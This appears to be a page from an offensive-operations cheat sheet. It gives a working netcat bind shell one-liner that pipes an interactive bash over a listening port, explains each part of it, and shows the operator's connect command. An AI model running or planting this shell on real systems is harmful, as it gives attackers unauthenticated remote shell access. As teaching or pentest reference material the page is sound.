BASH

TARGET: FIFO-BASED NETCAT BIND SHELL

root@target:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

 * the rm /tmp/f cmd removes any existing named pipe /tmp/f, just in case it exists.
 * the mkfifo /tmp/f cmd creates a named pipe at /tmp/f. this is a special file 
   used to pass input/output between processes.
 * the cat /tmp/f cmd reads from the pipe which will block and wait for 
   data (like shell commands).
 * the | /bin/bash -i feeds the input read from the pipe into an interactive Bash shell
 * the 2>&1 redirects stderr (2) to stdout (1), so both error and output go to 
   the same place.
 * the | nc -lvp 1234 does the following:
    - pipes the shell output into a Netcat listener.
    - netcat listens on port 1234 and waits for a connection.
    - once connected, whatever is typed is sent through to the pipe via /tmp/f, 
      and the shell responds.
 * the > /tmp/f cmd takes the input from the connected Netcat session and writes 
   it into /tmp/f, which is being read by cat.
   
  * Netcat listens on all interfaces (0.0.0.0) by default

OCO

#setup listener
root@oco:~$ nc {targetIP} {port}
 ...

PreviousBIND SHELL NextPYTHON

Last updated 20 hours ago